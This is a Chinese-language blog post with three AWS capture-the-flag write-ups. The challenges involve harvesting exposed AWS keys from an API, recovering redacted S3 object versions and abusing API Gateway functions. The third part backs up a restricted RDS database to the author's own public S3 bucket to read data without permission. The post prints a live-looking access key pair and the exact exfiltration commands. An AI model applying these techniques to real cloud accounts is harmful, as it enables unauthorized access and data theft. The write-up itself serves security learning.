三道有关AWS CTF 的 writeup

mickey 2019-05-13 04:26:19
CTF

0x00 来自Infiltrate 2019隐藏关卡的题

首先来到Greetings from the AWS Infiltrate Booth! 看说明,提示第三个Challenge是隐藏的

Third challenge is..somewhere? Around here? Elsewhere? Who knows.

看源码找线索

$ curl http://infiltrate.s3-website-us-east-1.amazonaws.com/

在HTML的末尾看到一些AJAX请求

  <script>
    function g(text) {document.getElementById("heading").innerHTML="<h1>"+text+"</h1>";}
    var awsimage=document.getElementById("AwsImage");
    var xhr=new XMLHttpRequest();
    // Promises, yo!  Learn to use Promises!
    xhr.onreadystatechange=function() { if (this.readyState==4 && this.status==200){ var results=JSON.parse(this.responseText); awsimage.src="https://"+results["bucket"]+"/img/"+results["image"]; } };
    xhr.open("GET", "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1", true);
    xhr.send();
    g("Welcome!");
  </script>

使用curl 请求下,发现返回了AWS Access Key ID 和 AWS Secret Access Key

$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1" |jq .

{
  "field2": "5/S8sTjlK2R6rIPvyhVl8GdTGEAceii52dN7cBnl",
  "image": "aws_1.png",
  "field1": "AKIAYOLTDOPA46OXMUO2",
  "bucket": "s3-us-west-2.amazonaws.com/c9092b7e-b87e-4aa8-ba59-67664c2133b1"
}

region可以通过dig cxwudbwxhc.execute-api.us-west-2.amazonaws.com得知是us-west-2, 有了这些信息后,本地就可以配置下awscli了.

$ aws configure --profile infiltrate2019
AWS Access Key ID [****************MUO2]:
AWS Secret Access Key [****************cBnl]:
Default region name [us-west-2]:

通过查看S3,发现f6f61719-4736-4421-9775-ce7651ab25e2桶下有个backup.tgz和notes.txt文件。把这些下回到本地。

$ aws s3 sync s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/ . --profile infiltrate2019
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/notes.txt to ./notes.txt
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/backup.tgz to ./backup.tgz

Notes.txt文件里没有什么有意义的,解压backup.tgz后,发现有个saved_message.eml,使用outlook直接查看,是个空邮件,感觉有蹊跷,命令行下用cat查看

$ tar zxvf backup.tgz
x aws_1.png
x aws_2.png
x aws_3.png
x aws_4.png
x aws_5.png
x aws_6.png
x aws_7.png
x saved_message.eml
$ cat saved_message.eml
From: Alice <[email protected]>
To: <[email protected]>
Message-ID: <162228743[email protected]>
Subject: Really necessary??
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="----=_Part_85228_1905676953.1554775383225"
iSightTracking: 6f0c16a3-032f-42eb-8741-68486d97ffcd
Date: Tue, 4 Apr 2017 02:03:03 +0000
X-EOPAttributedMessage: 0

Hey, Bob!

I'm still not sure that API is a good idea.  You included all of those
function() functions to do useful things but I'm still thinking that
cowsay() was a bad move. Yes...I know that a bad guy would need to add
"cowsays=moo" for it to do anything but I think we should be *more*
security-conscious.

~ Alice

P.S. Maybe unicornsay()?  I like unicorns.

根据saved_message.eml里的提示,替换function和参数访问API gateway, 又返回了另一个s3 bucket

curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=cowsay&cowsays=moo"
"\n<  s3://83d9a67f-0e37-499b-b7ba-abd50bd82307  >\n        \\   ^__^\n         \\  (oo)\\_______\n            (__)\\       )\\/                ||----w |\n                ||     ||\n"

名为83d9a67f-0e37-499b-b7ba-abd50bd82307的bucket下只有一个instructions.txt文件,本地查看发现该文件的敏感内容都被REDACTED掉了

$ aws s3 sync s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/ . --profile infiltrate2019
download: s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/instructions.txt to ./instructions.txt
$ cat instructions.txt
Alice,

I stashed the goodies where you can find them! ;)

<REDACTED>
<REDACTED>

P.S. I'm sorry.  The IT nerds told me to redact the above material.  Apparently, it's a "security issue". :(

查看该bucket是否开启了versions功能,如果开启了,可以找回REDACTED前的版本.

$ aws s3api list-object-versions --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --profile infiltrate2019
{
    "Versions": [
        {
            "LastModified": "2019-04-15T23:13:48.000Z",
            "VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_",
            "ETag": "\"2afaecf2c80d67e1c0d1b0436836f21f\"",
            "StorageClass": "STANDARD",
            "Key": "instructions.txt",
            "IsLatest": true,
            "Size": 193
        },
        {
            "LastModified": "2019-04-15T23:11:38.000Z",
            "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
            "ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
            "StorageClass": "STANDARD",
            "Key": "instructions.txt",
            "IsLatest": false,
            "Size": 108
        }
    ]
}

可以看到是有开启versions功能的,下载最早的instructions.txt回本地

$ aws s3api get-object --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --key "instructions.txt" ori-instructions.txt --version-id htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf --profile infiltrate2019
{
    "AcceptRanges": "bytes",
    "ContentType": "text/plain",
    "LastModified": "Mon, 15 Apr 2019 23:11:38 GMT",
    "ContentLength": 108,
    "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
    "ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
    "Metadata": {}
}
$ cat ori-instructions.txt
Alice,

I stashed the goodies where you can find them! ;)

function=ScumAndVillainy
MosEisley=<anything>

读取ori-instructions.txt后,根据提示,改变function来访问API gateway,得到最终的flag

$ curl "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=ScumAndVillainy&MosEisley=moo" -s | jq .
"flag{33e842a3-eaea-4b1e-8637-5cf6c686e0de}"

0x01 来自某CTF一道关于API gateway的题

挑战的描述很简单。获取邀请码,注册网站

还是先看搭建在S3 bucket上的静态HTML源码,就是一个包含登录和注册功能的页面。在HTML源码里发现AJAX请求到API gateway 以及一段被注释掉的HTML代码,根据alert判断,可以根据报错信息得到一些提示。

curl -s http://chanllenge1.s3-website-us-west-1.amazonaws.com/

<script type="text/javascript">   
$(document).ready(function() {                      

$("#submit").click(function(e) {
e.preventDefault();
$.ajax({
type: "GET",
dataType: 'json',
crossDomain: true,
contentType: "text/plain; charset=utf-8",
url: 'https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/login?rolename=signin&extId=7369676E696E',
success: function(res){  
},                     
error:function(xhr, ajaxOptions, thrownError){
alert('Lambda returned error\n\n remember, error are very useful!');
}
}); }) });
</script>
<!-- need to remove after testing: http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html -->

根据API Gateway的报错信息,可以得知,如果要获取到邀请码,需要rolename和extId, rolename根据路径信息和报错信息,推测应该就是invite了

curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/ |jq .
{"errorMessage": "'rolename'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 11, "lambda_handler", "rolename = str(event['query']['rolename'])"]]}

curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite {"errorMessage": "'extId'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 12, "lambda_handler", "extId = str(event['query']['extId'])"]]}

exitId是啥呢?接着访问 http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html, 发现返回如下文本信息

Operation Type Condition required?
signup signup user 7369676e757075736572
signin signin from admin pool 7369676e696e61646d696e
invite invite ? ?

使用burpsuite的“smart decode”功能尝试自动解码,最终发现
7369676e757075736572 通过ASCII HEX解码为signupuser
7369676e696e61646d696e 通过ASCII HEX解码为signinadmin

尝试把invite用ASCII HEX编码为,然后作为extID请求,获得最终的Flag

curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite&extId=696e76697465 | jq .
"CongratulaHons! flag is : CTF{1234_6666_2234_9999_0101} "

0x02 来自某CTF一道关于RDS的题

这个挑战直接给了一个软件调试的LOGS文件,通过LOGs文件可以发现MSSQL数据库的账号和位于us-west-1.rds.amazonaws.com.的主机名

使用Navicat去链接RDS, 查看RDS版本信息,可浏览的数据库,表。

SELECT @@version
Microsoft SQL Server 2017  - 14.0.3035.2 (X64)
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = flag);
flag_id

可以看到flag表里的flag_id列因该就是包含我们flag的地方了,直接用Navicat浏览,提示没有查看权限。尝试看看有没有备份权限,如果有备份权限,直接将该数据库备份到S3,然后再本地还原。

先在自己的S3里新建一个public权限的S3 bucket,我这里叫sqlbackup,然后回到Navicat控制台,执行如下命令:

exec msdb.dbo.rds_backup_database
        @source_db_name=secrets,
        @s3_arn_to_backup_to=arn:aws:s3:::sqlbackup/sql.bak,
        @overwrite_S3_backup_file=1,
        @type=FULL;

执行成功了,说明有backup的权限, 依赖于数据库大小,备份时间长短不一,用如下命令可以查看进度

exec msdb.dbo.rds_task_status @db_name=secrets;
8       BACKUP_DB       secrets     100     2       SUCCESS
[2019-03-11 13:25:22.013] Task execution has started.
[2019-03-11 13:25:22.110] 6 percent processed.
[2019-03-11 13:25:22.123] Processed 384 pages for database wwi-secrets, file secrets on file 1.
[2019-03-11 13:25:22.140] 100 percent processed.
[2019-03-11 13:25:22.140] BACKUP DATABASE successfully processed 386 pages in 0.009 seconds (334.255 MB/sec).
[2019-03-11 13:26:22.013] sql.bak: Completing S3 upload, waiting for S3 workers to clean up and exit
[2019-03-11 13:26:22.183] sql.bak: Completed processing 100% of S3 chunks.
[2019-03-11 13:26:22.357] sql.bak: Final chunk written to S3 successfully.
[2019-03-11 13:26:22.360] sql.bak: S3 processing completed successfully
[2019-03-11 13:26:22.360] Command execution completed successfully.     2019-03-11 13:26:22.360 2019-03-11 13:24:26.526 arn:aws:s3::: sqlbackup/sql.bak  1      

然后本地使用SQL管理器恢复sql.bak文件,就可以看到flag了

评论

园长 2019-05-13 10:25:48

mickey师傅还活着呢?

于小葵 2019-05-13 10:29:36

园长师傅好久不见

雪碧0xroot 2019-05-13 11:26:54

mickey师傅好

mickey 2019-05-13 13:45:50

回园长师傅,嗯,凑活活着 :( .

C

cnhello 2019-05-13 14:17:48

众望所归

H

her0ma 2019-05-13 15:23:41

膜拜mickey师傅

沦沦 2019-05-14 08:17:26

大园长师傅

TuuuNya 2019-05-14 09:39:16

Mickey师父好~

P

papa 2019-05-14 12:04:02

园长师傅好,谢谢师傅分享的Java代码审计,

B

Bincker 2019-05-14 14:31:57

mickey师傅好~

K

Kerwin 2019-05-15 12:02:39

请问大神有做infiltrate2019 ctf的第二题么

mickey 2019-05-15 14:28:35

@Kerwin,可否给个联系方式,亲爱的!

K

Kerwin 2019-05-16 01:12:02

@mickey, 啊啊 wx: lashane360

mickey

此号多人用,发表任何信息不代表本人观点

twitter weibo github wechat

热门分类

Web安全 文章:240 篇
事件分析 文章:223 篇
漏洞分析 文章:208 篇
渗透测试 文章:151 篇
木马与病毒 文章:125 篇

最新评论

Z

Zedd

貌似比赛没结束是不是不太适合发出来...

A

ADguy

这也能登上来?iscc

C

Ciph2r

Hack by dacucu

Z

z7y

Hack by dacucu

Hxai11

学习了